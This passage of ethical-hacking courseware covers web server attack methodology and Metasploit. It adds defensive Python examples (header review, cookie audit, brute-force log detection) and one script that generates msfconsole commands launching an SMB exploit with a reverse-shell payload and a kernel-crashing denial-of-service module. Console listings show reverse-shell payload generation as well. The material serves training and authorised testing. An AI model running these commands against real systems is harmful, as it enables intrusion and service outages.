Session Hijacking: Session hijacking is an attack in which the attacker exploits, steals, predicts, or negotiates the real, valid web session control mechanism to access the authenticated parts of a web application.
Module 12 Page 1635
37. Module Flow
- Webserver Concepts
- Webserver Attacks
- Attack Methodology
- Webserver Attack Tools
- Webserver Pen Testing
- Webserver Security Tools
- Patch Management
- Counter-measures
So far we have discussed web server concepts and the various techniques attackers use to hack web servers. Attackers usually hack a web server by following a procedural method. Now we will discuss the attack methodology used by attackers to compromise web servers. This section provides insight into the attack methodology and the tools that help at various stages of hacking.
Module 12 Page 1636
38. Web Server Attack Methodology
[Slide figure: information gathering, webserver footprinting, mirroring website, vulnerability scanning, session hijacking, hacking webserver passwords]
Hacking a web server is accomplished in various stages. At each stage the attacker tries to gather more information about loopholes and to gain unauthorized access to the web server. The stages of the web server attack methodology include:
Information Gathering: Every attacker tries to collect as much information as possible about the target web server. Once the information is gathered, he or she analyzes it in order to find security lapses in the current mechanism of the web server.
Web Server Footprinting: The purpose of footprinting is to gather more information about the security aspects of a web server with the help of tools or footprinting techniques. The main purpose is to learn about its remote access capabilities, its ports and services, and the aspects of its security.
Mirroring Website: Website mirroring is a method of copying a website and its content onto another server for offline browsing.
Vulnerability Scanning:
Module 12 Page 1637
39. Vulnerability scanning is a method of finding various vulnerabilities and misconfigurations of a web server. It is done with the help of various automated tools known as vulnerability scanners.
Session Hijacking: Session hijacking is possible once the current session of the client is identified. The attacker takes complete control of the user session by means of session hijacking.
Hacking Web Server Passwords: Attackers use various password cracking methods such as brute force attacks, hybrid attacks, dictionary attacks, etc. to crack web server passwords.
Module 12 Page 1638
40. Web Server Attack Methodology: Information Gathering
Information gathering involves collecting information about the targeted company. Attackers search the Internet, newsgroups, bulletin boards, etc. for information about the company. Attackers use tools such as Whois, Traceroute, Active Whois, etc. and query the Whois databases to get details such as a domain name, an IP address, or an autonomous system number.
Note: For complete coverage of information gathering techniques refer to Module 02: Footprinting and Reconnaissance.
[Slide figure: WHOIS lookup at http://www.whois.net]
Before hacking, every attacker first collects all the required information, such as the versions and technologies used by the web server. Attackers search the Internet, newsgroups, bulletin boards, etc. for information about the company. Most of the attacker's time is spent in the information gathering phase; that is why information gathering is both an art and a science. Many tools can be used for information gathering or to get details such as a domain name, an IP address, or an autonomous system number. The tools include:
- Whois
- Traceroute
- Active Whois
- Nmap
- Angry IP Scanner
- Netcat
Whois
Module 12 Page 1639
41. Source: http://www.whois.net
Whois allows you to perform a domain whois search and a whois IP lookup, and to search the whois database for relevant information on domain registration and availability. This can help provide insight into a domain's history and additional information. It can be used to see who owns a domain name, how many pages from a site are listed with Google, or even to search the Whois address listings for a website's owner.
FIGURE 12.13: WHOIS Information Gathering (WHOIS information for ebay.com)
Module 12 Page 1640
42. Web Server Attack Methodology: Web Server Footprinting

Gather valuable system-level information such as account details, operating system, software versions, server names, and database schema details. Telnet to a web server to footprint it and gather information such as server name, server type, operating system, applications running, etc. Use tools such as ID Serve, httprecon, and Netcraft to perform footprinting.

(Slide screenshot: Netcraft "Search Web by Domain", results for microsoft; see Figure 12.14)

http://toolbar.netcraft.com

The purpose of footprinting is to gather account details, operating system and other software versions, server names, database schema details, and as much information as possible about the security aspects of a target web server or network. The main purpose is to learn about its remote access capabilities, open ports and services, and the security mechanisms implemented. Telnet to a web server to footprint it and gather information such as server name, server type, operating system, applications running, etc. Examples of tools used for performing footprinting include ID Serve, httprecon, Netcraft, etc.

Netcraft

Source: http://toolbar.netcraft.com

Netcraft is a tool used to determine the OSes in use by the target organization. It has already been discussed in detail in the Footprinting and Reconnaissance module.
43. FIGURE 12.14: Web Server Footprinting (Netcraft "Search Web by Domain" results for microsoft: 252 sites found, each linked to a site report listing netblock, OS and web server)
44. Web Server Footprinting Tools

(Slide screenshots: httprecon 7.3 fingerprinting http://www.nytimes.com:80/ and ID Serve querying www.google.com; see Figures 12.15 and 12.16)

http://www.computec.ch
http://www.grc.com

We have already discussed the Netcraft tool. In addition to Netcraft, there are two more tools that allow you to perform web server footprinting: Httprecon and ID Serve.

Httprecon

Source: http://www.computec.ch

Httprecon is a tool for advanced web server fingerprinting. The httprecon project is doing research in the field of web server fingerprinting, also known as HTTP fingerprinting. The goal is the highly accurate identification of given httpd implementations. This software shall improve the ease and efficiency of this kind of enumeration.
45. FIGURE 12.15: Httprecon Screenshot (httprecon 7.3 analyzing http://www.nytimes.com:80/ with the GET existing, GET long request, GET non-existing, GET wrong protocol, HEAD existing and OPTIONS common probes; the match list ranks candidates such as Oracle Application Server 10g, Sun Java System Web Server 7.0, Abyss 2.5.0.0 X1, Apache 2.0.52 and Apache 2.2.5 by hit count and match percentage)

ID Serve

Source: http://www.grc.com

ID Serve is a simple Internet server identification utility. ID Serve can almost always identify the make, model, and version of any website's server software. This information is usually sent in the preamble of replies to web queries, but it is not shown to the user. ID Serve can also connect with non-web servers to receive and report that server's greeting message. This generally reveals the server's make, model, version, and other potentially useful information. Simply by entering any IP address, ID Serve will attempt to determine the associated domain name.
46. FIGURE 12.16: ID Serve (Internet Server Identification Utility v1.02 querying www.google.com; the response headers shown are Server: gws, Content-Length: 221, X-XSS-Protection: 1; mode=block, X-Frame-Options: SAMEORIGIN and Connection: close, and the server identified itself as gws)
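The ID Serve screenshot above shows the raw HTTP response headers a server returns before any page content. The following is an added example, not code from this module or from ID Serve, httprecon or Netcraft: it parses a raw HTTP/1.x response, reports which headers disclose the server software, and lists the hardening headers a defender would expect to find. The sample response is constructed to resemble the headers in the screenshot; it is not a capture from any real server, and the header lists are an assumption for the demonstration.

```python
"""Review what a web server's HTTP response headers reveal.

Added example (not from the CEH module or any of the tools it names).
The raw response below is constructed to resemble the headers ID Serve
displays; it is not a captured response from any real server.
"""
from __future__ import annotations

# Headers that describe the server software; these are what a
# fingerprinting tool reads first (assumption: illustrative list).
DISCLOSURE_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-aspnetmvc-version")

# Hardening headers a defender expects on a production site
# (assumption: illustrative list).
EXPECTED_HEADERS = (
    "x-frame-options",
    "x-content-type-options",
    "strict-transport-security",
    "content-security-policy",
)

# Constructed sample response, modelled on the ID Serve screenshot.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: gws\r\n"
    b"Content-Length: 221\r\n"
    b"X-XSS-Protection: 1; mode=block\r\n"
    b"X-Frame-Options: SAMEORIGIN\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"<html>...</html>"
)


def parse_response(raw: bytes) -> tuple[str, dict[str, str]]:
    """Split a raw HTTP/1.x response into its status line and a header map.

    Header names are lower-cased so lookups are case-insensitive, as HTTP
    requires. Obsolete folded (multi-line) headers are not handled.
    """
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status_line = lines[0]
    headers: dict[str, str] = {}
    for line in lines[1:]:
        if not line:
            continue
        name, sep, value = line.partition(":")
        if not sep:
            raise ValueError(f"malformed header line: {line!r}")
        headers[name.strip().lower()] = value.strip()
    return status_line, headers


def review_headers(headers: dict[str, str]) -> dict[str, object]:
    """Report what the response discloses and which hardening headers are absent."""
    disclosed = {h: headers[h] for h in DISCLOSURE_HEADERS if h in headers}
    missing = [h for h in EXPECTED_HEADERS if h not in headers]
    return {"disclosed": disclosed, "missing": missing}


def review_raw(raw: bytes) -> dict[str, object]:
    """Parse and review a raw response in one step."""
    status, headers = parse_response(raw)
    report = review_headers(headers)
    report["status"] = status
    return report


if __name__ == "__main__":
    report = review_raw(SAMPLE_RESPONSE)
    print(report["status"])
    for name, value in report["disclosed"].items():
        print(f"disclosed: {name}: {value}")
    for name in report["missing"]:
        print(f"missing:   {name}")
```

Run against your own server's response (for example the bytes returned by a socket or an HTTP library) to see exactly what a footprinting tool will learn; trimming the Server header to a product name without a version, as in the sample, limits what version-specific fingerprinting can match on.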
47. Web Server Attack Methodology: Mirroring a Website

Mirror a website to create a complete profile of the site's directory structure, file structure, external links, etc. Search for comments and other items in the HTML source code to make footprinting activities more efficient. Use tools such as HTTrack, WebCopier Pro, Blackwidow, etc. to mirror a website.

(Slide screenshot: HTTrack Website Copier; see Figure 12.17)

http://www.httrack.com

Website mirroring is a method of copying a website and its content onto another server. By mirroring a website, a complete profile of the site's directory structure, file structure, external links, etc. is created. Once the mirror website is created, search for comments and other items in the HTML source code to make footprinting activities more efficient. Various tools used for web server mirroring include HTTrack, Webripper 2.0, WinWSD, Webcopier, and Blackwidow.

HTTrack

Source: http://www.httrack.com

HTTrack is an offline browser utility. It allows you to download a World Wide Web site from the Internet to a local directory, recursively building all directories and getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link structure.
Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online.
48. FIGURE 12.17: Mirroring a Website (HTTrack "Site mirroring in progress" window for Test Project.whtt: 2/14 (+13) links scanned, 14 files written, 320.26 KB saved, currently scanning www.certifiedhacker.com)
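The step after mirroring is to search the downloaded HTML for comments. The following is an added example and is not part of this module or of HTTrack: it collects every HTML comment in a page with the standard library parser, flags the ones that mention words a reviewer cares about, and can walk a mirror directory such as the one HTTrack produces. A defender can run it over an export of their own site before publishing. The sample page, its comments and the keyword list are constructed for this demonstration.

```python
"""Find HTML comments in a mirrored copy of a site.

Added example, not part of the CEH module or of HTTrack. It stands in for
the "search for comments in the HTML source" step: a defender can run it
over their own site export (or an HTTrack mirror directory) before it is
published. The sample page below is constructed for the demonstration.
"""
from __future__ import annotations

import re
from html.parser import HTMLParser
from pathlib import Path

# Words that make a comment worth a human look (assumption: illustrative list).
KEYWORDS = ("todo", "fixme", "password", "admin", "debug", "internal", "remove")

# Constructed sample page; the comments are invented for this example.
SAMPLE_PAGE = """<!DOCTYPE html>
<html><head><title>Example</title>
<!-- generated by build 2.3.1 -->
</head><body>
<!-- TODO: remove the debug panel before launch -->
<p>Hello</p>
<!-- old admin path was /manage; keep for reference -->
</body></html>
"""


class CommentCollector(HTMLParser):
    """HTMLParser subclass that records every comment with its line number."""

    def __init__(self) -> None:
        super().__init__()
        self.comments: list[tuple[int, str]] = []

    def handle_comment(self, data: str) -> None:
        line, _col = self.getpos()  # position where the comment starts
        self.comments.append((line, data.strip()))


def find_comments(html: str) -> list[tuple[int, str]]:
    """Return (line, text) for each comment in an HTML document."""
    parser = CommentCollector()
    parser.feed(html)
    parser.close()
    return parser.comments


def flag_comments(html: str) -> list[tuple[int, str]]:
    """Return only the comments that mention one of KEYWORDS."""
    pattern = re.compile("|".join(re.escape(k) for k in KEYWORDS), re.IGNORECASE)
    return [(line, text) for line, text in find_comments(html) if pattern.search(text)]


def scan_mirror(root: Path) -> dict[str, list[tuple[int, str]]]:
    """Walk a mirror directory and flag comments in every .html/.htm file."""
    findings: dict[str, list[tuple[int, str]]] = {}
    for path in sorted(root.rglob("*")):
        if path.suffix.lower() in (".html", ".htm") and path.is_file():
            flagged = flag_comments(path.read_text(encoding="utf-8", errors="replace"))
            if flagged:
                findings[str(path.relative_to(root))] = flagged
    return findings


if __name__ == "__main__":
    for line, text in flag_comments(SAMPLE_PAGE):
        print(f"line {line}: {text}")
```

`scan_mirror(Path("my_site_mirror"))` returns a map of file path to flagged comments, which is the list a release reviewer needs; the unflagged build comment in the sample shows why keyword filtering matters on a large mirror.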
49. Web Server Attack Methodology: Vulnerability Scanning

Perform vulnerability scanning to identify weaknesses in a network and determine if the system can be exploited. Sniff the network traffic to find out active systems, network services, applications, and vulnerabilities present. Use a vulnerability scanner such as HP WebInspect, Nessus, Zaproxy, etc. to find hosts, services, and vulnerabilities. Test the web server infrastructure for any misconfiguration, outdated content, and known vulnerabilities.

http://www.nessus.org

Vulnerability scanning is a method of determining the various vulnerabilities and misconfigurations of a target web server or network. Vulnerability scanning is done with the help of automated tools known as vulnerability scanners. Vulnerability scanning allows determining the vulnerabilities that exist in the web server and its configuration; thus, it helps to determine whether the web server is exploitable or not. Sniffing techniques are applied to the network traffic to find out active systems, network services, applications, and vulnerabilities present. Also, attackers test the web server infrastructure for any misconfiguration, outdated content, and known vulnerabilities. Various tools are used for vulnerability scanning, such as HP WebInspect, Nessus, Paros proxy, etc., to find hosts, services, and vulnerabilities.

Nessus

Source: http://www.nessus.org

Nessus is a security scanning tool that scans the system remotely and reports the vulnerabilities it detects before an attacker actually attacks and compromises them.
Its features include high-speed discovery, configuration auditing, asset profiling, sensitive data discovery, patch management integration, and vulnerability analysis of your security posture, with features that enhance usability, effectiveness, efficiency, and communication with all parts of your organization.

50. FIGURE 12.18: Nessus Screenshot (policy editor for an internal network scan: general settings, port scan options, safe checks and plugin selection)
51. Web Server Attack Methodology: Session Hijacking

Sniff valid session IDs to gain unauthorized access to the web server and snoop the data. Use session hijacking techniques such as session fixation, session sidejacking, cross-site scripting, etc. to capture valid session cookies and IDs. Use tools such as Burp Suite, Hamster, Firesheep, etc. to automate session hijacking.

(Slide screenshot: Burp Suite Free Edition; see Figure 12.19)

http://portswigger.net

Note: For complete coverage of Session Hijacking concepts and techniques refer to Module 11: Session Hijacking.

Session hijacking is possible once the current session of the client is identified. Complete control of the user session can be taken over by the attacker once the user establishes authentication with the server. With the help of sequence number prediction tools, attackers perform session hijacking. The attacker, after identifying the open session, predicts the sequence number of the next packet and then sends the data packets before the legitimate user sends the response with the correct sequence number. Thus, an attacker performs session hijacking.
In addition to this technique, you can also use other session hijacking techniques such as session fixation, session sidejacking, cross-site scripting, etc. to capture valid session cookies and IDs. Various tools used for session hijacking include Burp Suite, Hamster, Firesheep, etc.

Burp Suite

Source: http://portswigger.net

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. The key components of Burp Suite include the proxy, scanner, intruder tool, repeater tool, sequencer tool, etc.
52. FIGURE 12.19: Burp Suite Screenshot (Burp Suite Free Edition v1.4.01, target tab: site map with requests to http://edition.cnn.com, the selected GET request with status 200, and its request headers including User-Agent and Accept)
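The techniques listed above (sidejacking, cross-site scripting, cross-site requests) each target a session cookie that lacks a specific attribute. The following is an added example, not from this module, Burp Suite or any other tool named here: it parses a Set-Cookie header value and reports which of the defensive attributes is missing, so a defender can review their own application's session cookie against exactly those techniques. The two cookie values are constructed for the demonstration.

```python
"""Check session cookie attributes against common session hijacking techniques.

Added example; not from the CEH module, Burp Suite or any other tool named
on this page. The Set-Cookie values are constructed for the demonstration.
"""
from __future__ import annotations

# Constructed samples: one weak cookie, one hardened cookie.
WEAK_COOKIE = "JSESSIONID=9A7F3C2E1D; Path=/"
HARDENED_COOKIE = "__Host-session=4f1a9c0b; Path=/; Secure; HttpOnly; SameSite=Lax"


def parse_set_cookie(header_value: str) -> tuple[str, str, dict[str, str]]:
    """Split a Set-Cookie value into (name, value, {attribute: value}).

    Attribute names are lower-cased; flag attributes such as Secure map to "".
    """
    parts = [p.strip() for p in header_value.split(";")]
    name, sep, value = parts[0].partition("=")
    if not sep or not name:
        raise ValueError(f"not a cookie pair: {parts[0]!r}")
    attrs: dict[str, str] = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _sep, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def review_cookie(header_value: str) -> list[str]:
    """Return the weaknesses found in a session cookie; empty if none."""
    name, _value, attrs = parse_set_cookie(header_value)
    issues: list[str] = []
    # Sidejacking: without Secure the cookie is also sent over plain HTTP,
    # where it can be sniffed.
    if "secure" not in attrs:
        issues.append("missing Secure: cookie is sent over plaintext HTTP")
    # Cross-site scripting: HttpOnly keeps document.cookie from exposing the
    # value to injected script.
    if "httponly" not in attrs:
        issues.append("missing HttpOnly: script on the page can read the cookie")
    # Cross-site requests: SameSite stops the browser attaching the cookie to
    # requests initiated from other sites.
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        issues.append("SameSite is not Lax or Strict")
    # The __Host- prefix binds the cookie to one host; browsers only accept it
    # with Secure, Path=/ and no Domain attribute.
    if name.startswith("__Host-") and (
        "domain" in attrs or attrs.get("path") != "/" or "secure" not in attrs
    ):
        issues.append("__Host- prefix requirements not met")
    return issues


if __name__ == "__main__":
    for label, cookie in (("weak", WEAK_COOKIE), ("hardened", HARDENED_COOKIE)):
        print(label, review_cookie(cookie) or "ok")
```

Session fixation is not a cookie attribute problem and is not checked here; the mitigation for it is server-side, issuing a fresh session ID at the moment the user authenticates.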
53. Web Server Attack Methodology: Hacking Web Passwords

Use password cracking techniques such as brute force attack, dictionary attack, and password guessing to crack web server passwords. Use tools such as Brutus, THC-Hydra, etc.

(Slide screenshot: Brutus AET2; see Figure 12.20)

http://www.hoobie.net

One of the main tasks of any attacker is password hacking. By hacking a password, the attacker gains complete control over the web server. Various methods used by attackers for password hacking include password guessing, dictionary attacks, brute force attacks, hybrid attacks, syllable attacks, precomputed hashes, rule-based attacks, distributed network attacks, rainbow attacks, etc. Password cracking can also be performed with the help of tools such as Brutus, THC-Hydra, etc.

Brutus

Source: http://www.hoobie.net

Brutus is an online or remote password cracking tool. Attackers use this tool for hacking web passwords without the knowledge of the victim. The features of the Brutus tool are explained briefly on the following slide.
54. FIGURE 12.20: Brutus Screenshot (Brutus AET2, www.hoobie.net/brutus, January 2000: target 10.0.0.17, type HTTP [Basic Auth], port 80, 10 connections, timeout 10, method HEAD with Keep-Alive, pass mode Word List with a user file and a word file; the status pane reports 1 authentication plug-in installed, the target verified, 5 users and 818 passwords loaded and a maximum of 4908 authentication attempts, and the results pane lists the positive authentication results)
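The Brutus screenshot shows what the attack looks like from the client side: one source address, one protected path, HEAD requests, and hundreds of attempts. From the server side the same activity is a burst of 401 responses in the access log, followed by a 2xx if a guess succeeds. The following is an added example, not from this module or from Brutus: detection logic that parses common-format access log lines and raises an alert for a client that accumulates a threshold of 401s inside a sliding window, marking whether a success followed. The log lines, addresses and timestamps are constructed; the threshold and window are assumptions to tune for your traffic.

```python
"""Detect HTTP Basic Auth brute forcing in web server access logs.

Added example (not from the CEH module or the Brutus tool). It applies the
usual server-side signal for the attack on this page: a burst of 401
responses for one client address inside a short window. The log lines are
constructed in common log format; the addresses and timestamps are invented.
"""
from __future__ import annotations

import re
from collections import defaultdict
from datetime import datetime, timedelta

# Common log format: ip ident user [timestamp] "method path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample log: one client hammering /admin/ with HEAD requests and
# collecting 401s, then a 200; ordinary traffic and one single typo mixed in.
SAMPLE_LOG = """\
203.0.113.9 - admin [10/Oct/2012:13:55:36 +0000] "HEAD /admin/ HTTP/1.0" 401 0
203.0.113.9 - admin [10/Oct/2012:13:55:37 +0000] "HEAD /admin/ HTTP/1.0" 401 0
198.51.100.4 - - [10/Oct/2012:13:55:37 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.9 - admin [10/Oct/2012:13:55:38 +0000] "HEAD /admin/ HTTP/1.0" 401 0
203.0.113.9 - admin [10/Oct/2012:13:55:39 +0000] "HEAD /admin/ HTTP/1.0" 401 0
192.0.2.7 - alice [10/Oct/2012:13:55:39 +0000] "GET /admin/ HTTP/1.1" 401 0
203.0.113.9 - admin [10/Oct/2012:13:55:40 +0000] "HEAD /admin/ HTTP/1.0" 401 0
203.0.113.9 - admin [10/Oct/2012:13:55:41 +0000] "HEAD /admin/ HTTP/1.0" 401 0
203.0.113.9 - admin [10/Oct/2012:13:55:42 +0000] "HEAD /admin/ HTTP/1.0" 200 0
198.51.100.4 - - [10/Oct/2012:13:55:43 +0000] "GET /style.css HTTP/1.1" 200 88
"""


def parse_line(line: str) -> dict[str, object] | None:
    """Parse one access log line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "user": m["user"],
        "ts": datetime.strptime(m["ts"], TS_FORMAT),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
    }


def detect_bruteforce(lines, threshold: int = 5, window: timedelta = timedelta(seconds=60)):
    """Alert on clients with >= threshold 401s inside a sliding window.

    Each alert records the client, the number of failures in the window, the
    first and last failure time, and whether a 2xx from the same client
    followed the burst (a sign that a guess succeeded).
    """
    events = [e for e in (parse_line(l) for l in lines) if e]
    events.sort(key=lambda e: e["ts"])  # logs are usually ordered, but be safe
    failures: dict[str, list[datetime]] = defaultdict(list)
    alerts: dict[str, dict[str, object]] = {}
    for e in events:
        ip, ts, status = str(e["ip"]), e["ts"], int(e["status"])
        if status == 401:
            recent = [t for t in failures[ip] if ts - t <= window]  # drop stale entries
            recent.append(ts)
            failures[ip] = recent
            if len(recent) >= threshold:
                alert = alerts.setdefault(
                    ip, {"ip": ip, "failures": 0, "first": recent[0], "last": ts, "success_after": False}
                )
                alert["failures"] = len(recent)
                alert["last"] = ts
        elif 200 <= status < 300 and ip in alerts:
            alerts[ip]["success_after"] = True
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(alert)
```

The single 401 from 192.0.2.7 never reaches the threshold, which is the point of the window: a user mistyping a password is not an alert, a client cycling a word list is. A `success_after` of True is the case to escalate, since it corresponds to the "positive authentication result" a cracking tool reports.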
55. Module Flow

Webserver Concepts | Webserver Attacks | Attack Methodology | Webserver Attack Tools | Webserver Pen Testing | Webserver Security Tools | Patch Management | Counter-measures

The tools intended for monitoring and managing the web server can also be used by attackers for malicious purposes. In this day and age, attackers implement various methods to hack web servers. Attackers with minimal knowledge about hacking usually use tools for hacking web servers.

This section lists and describes various web server attack tools.
56. Web Server Attack Tools: Metasploit

The Metasploit Framework is a penetration testing toolkit, exploit development platform, and research tool that includes hundreds of working remote exploits for a variety of platforms. It supports fully automated exploitation of web servers by abusing known vulnerabilities and leveraging weak passwords via Telnet, SSH, HTTP, and SNMP.

(Slide screenshot: Metasploit dashboard; see Figure 12.21)

http://www.metasploit.com

Source: http://www.metasploit.com

The Metasploit framework makes discovering, exploiting, and sharing vulnerabilities quick and relatively painless. It enables users to identify, assess, and exploit vulnerable web applications. Using VPN pivoting, you can run the NeXpose vulnerability scanner through the compromised web server to discover an exploitable vulnerability in a database that hosts confidential customer data and employee information. Your team members can then leverage the data gained to conduct social engineering in the form of a targeted phishing campaign, opening up new attack vectors on the internal network, which are immediately visible to the entire team. Finally, you generate executive and audit reports based on the corporate template to enable your organization to mitigate the attacks and remain compliant with Sarbanes-Oxley, HIPAA, or PCI DSS. Metasploit enables teams of penetration testers to coordinate orchestrated attacks against target systems and team leads to manage project access on a per-user basis. In addition, Metasploit includes customizable reporting.
Metasploit enables you to:

- Complete penetration test assignments faster by automating repetitive tasks and leveraging multi-level attacks
- Assess the security of web applications, network and endpoint systems, as well as email users
- Emulate realistic network attacks based on the leading Metasploit framework with more than one million unique downloads in the past year
- Test with the world's largest public database of quality assured exploits
- Tunnel any traffic through compromised targets to pivot deeper into the network
- Collaborate more effectively with team members in concerted network tests
- Customize the content and template of executive, audit, and technical reports

57. FIGURE 12.21: Metasploit Screenshot (Metasploit dashboard: target systems by operating system (Top 5), network services (Top 5) and recent activity)
58. Metasploit Architecture

(Slide diagram: Metasploit architecture; see Figure 12.22)

The Metasploit framework is an open-source exploitation framework that is designed to provide security researchers and pen testers with a uniform model for rapid development of exploits, payloads, encoders, NOP generators, and reconnaissance tools. The framework provides the ability to reuse large chunks of code that would otherwise have to be copied or reimplemented on a per-exploit basis. The framework was designed to be as modular as possible in order to encourage the reuse of code across various projects. The framework itself is broken down into a few different pieces, the lowest level being the framework core. The framework core is responsible for implementing all of the required interfaces that allow for interacting with exploit modules, sessions, and plugins. It supports vulnerability research, exploit development, and the creation of custom security tools.
59. FIGURE 12.22: Metasploit Architecture

Libraries: Rex, Framework-Core, Framework-Base
Custom Plug-ins
Protocol Tools
Interfaces: msfconsole, msfcli, msfweb, msfwx, msfapi
Security Tools
Web Services
Integration
Modules: Exploits, Payloads, Encoders, NOPs, Auxiliary
60. Metasploit Exploit Module

The exploit module is the basic module in Metasploit used to encapsulate an exploit, using which users target many platforms with a single exploit. This module comes with simplified meta-information fields. Using a Mixins feature, users can also modify exploit behavior dynamically, perform brute force attacks, and attempt passive exploits. Following are the steps to exploit a system using the Metasploit framework:

- Configuring Active Exploit
- Verifying the Exploit Options
- Selecting a Target
- Selecting the Payload
- Launching the Exploit
61. Metasploit Payload Module

- A payload module establishes a communication channel between the Metasploit framework and the victim host
- It combines the arbitrary code that is executed as the result of an exploit succeeding
- To generate payloads, first select a payload using the command shown in Figure 12.23

The Metasploit payload module offers shellcode that can perform a number of interesting tasks for an attacker. A payload is a piece of software that lets you control a computer system after it has been exploited. The payload is typically attached to and delivered by the exploit. An exploit carries the payload in its backpack when it breaks into the system and then leaves the backpack there. With the help of a payload, you can upload and download files from the system, take screenshots, and collect password hashes. You can even take over the screen, mouse, and keyboard to fully control the computer. To generate payloads, first select a payload using the command:
62. Metasploit Payload Module (continued)

    Command Prompt
    msf > use windows/shell_reverse_tcp
    msf payload(shell_reverse_tcp) > generate -h
    Usage: generate [options]

    Generates a payload.

    OPTIONS:

        -b <opt>  The list of characters to avoid: '\x00\xff'
        -e <opt>  The name of the encoder module to use.
        -h        Help banner.
        -o <opt>  A comma separated list of options in VAR=VAL format.
        -s <opt>  NOP sled length.
        -t <opt>  The output type: ruby, perl, c, or raw.

    msf payload(shell_reverse_tcp) >

FIGURE 12.23: Metasploit Payload Module

Module 12 Page 1661
63. Metasploit Auxiliary Module

Metasploit's auxiliary modules can be used to perform arbitrary, one-off actions such as port scanning, denial of service, and even fuzzing. To run an auxiliary module, either use the run command or the exploit command; the two are equivalent for auxiliary modules. Unlike an exploit module, an auxiliary module carries no payload, so there is no payload or target to select: set the module's options and run it. The module in the figure is a denial-of-service module that crashes the target's kernel, so run it only against systems you are authorised to take down.

    Command Prompt
    msf > use dos/windows/smb/ms06_035_mailslot
    msf auxiliary(ms06_035_mailslot) > set RHOST 1.2.3.4
    RHOST => 1.2.3.4
    msf auxiliary(ms06_035_mailslot) > run
    [*] Mangling the kernel, two bytes at a time...

FIGURE 12.24: Metasploit Auxiliary Module

Module 12 Page 1662
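The five-step exploit procedure on slide 60 and the auxiliary-module run above are usually scripted rather than typed, as an msfconsole resource script (a text file of console commands run with msfconsole -r). The following is an added example, not EC-Council's or Metasploit's own code: it emits such a script from a module path and its options, enforcing that a target host is set and that reverse-connect payloads have an LHOST before anything is launched. The module and payload names in the usage section (ms08_067_netapi, windows/meterpreter/reverse_tcp) are illustrative assumptions, and check only works for exploits that implement it.

```python
"""Generate an msfconsole resource script (.rc) for the module workflow on
this page: exploit modules (configure, verify options, select target,
select payload, launch) and auxiliary modules (configure, run).

Added example, not EC-Council's or Metasploit's own code.  The module and
payload names in the usage section are illustrative assumptions; `check`
only works for exploits that implement it.  Module paths must carry their
type prefix (exploit/..., auxiliary/...).
"""
import re

_IPV4 = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")
_HOSTNAME = re.compile(r"^[A-Za-z0-9]([A-Za-z0-9.-]*[A-Za-z0-9])?$")


def valid_host(value):
    """Accept a dotted-quad IPv4 address (octets 0-255) or a plausible hostname."""
    if _IPV4.match(value):
        return all(0 <= int(octet) <= 255 for octet in value.split("."))
    return _HOSTNAME.match(value) is not None


def build_rc(module, options, payload=None, target=None, check=True):
    """Return the msfconsole commands, in order, for one module run.

    module  -- full module path, e.g. "exploit/windows/smb/ms08_067_netapi"
    options -- datastore options; RHOST or RHOSTS is mandatory
    payload -- payload name for exploit modules (ignored for auxiliary ones)
    target  -- numeric target id, for exploits that list several targets
    check   -- run the module's vulnerability check before exploiting
    """
    host = options.get("RHOSTS") or options.get("RHOST")
    if not host or not valid_host(str(host)):
        raise ValueError("RHOST/RHOSTS must be set to a valid host")
    is_exploit = module.startswith("exploit/")
    # Heuristic: reverse-connect payloads need an address to connect back to.
    if is_exploit and payload and "reverse" in payload and "LHOST" not in options:
        raise ValueError("reverse payloads require LHOST")

    lines = [f"use {module}"]                          # step 1: configure
    lines += [f"set {key} {value}" for key, value in options.items()]
    if not is_exploit:
        lines.append("run")                            # auxiliary: just run it
        return lines
    lines.append("show options")                       # step 2: verify options
    if target is not None:
        lines.append(f"set TARGET {target}")           # step 3: select target
    if payload:
        lines.append(f"set PAYLOAD {payload}")         # step 4: select payload
    if check:
        lines.append("check")                          # confirm before firing
    lines.append("exploit")                            # step 5: launch
    return lines


def write_rc(path, lines):
    """Write the commands to a file runnable with: msfconsole -q -r <path>"""
    with open(path, "w") as fh:
        fh.write("\n".join(lines) + "\n")
    return path


if __name__ == "__main__":
    # Assumed values for illustration; use only hosts you are authorised to test.
    rc = build_rc("exploit/windows/smb/ms08_067_netapi",
                  {"RHOST": "10.0.0.5", "LHOST": "10.0.0.2"},
                  payload="windows/meterpreter/reverse_tcp", target=0)
    print("\n".join(rc))
    aux = build_rc("auxiliary/dos/windows/smb/ms06_035_mailslot", {"RHOST": "1.2.3.4"})
    print("\n".join(aux))
```

Keeping the option validation outside msfconsole means a typo in RHOST fails before the framework ever connects to anything, and the generated file doubles as a record of exactly what was run during the engagement.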
64. Metasploit NOPS Module

Metasploit NOP modules generate no-operation instructions that are used for padding out buffers. The NOP module console interface supports generating a NOP sled of an arbitrary size and displaying it in a given format, using the generate command.

    OPTIONS:

        -b <opt>  The list of characters to avoid: '\x00\xff'
        -h        Help banner.
        -s <opt>  The comma separated list of registers to save.
        -t <opt>  The output type: ruby, perl, c, or raw.

    Generates a NOP sled of a given length.

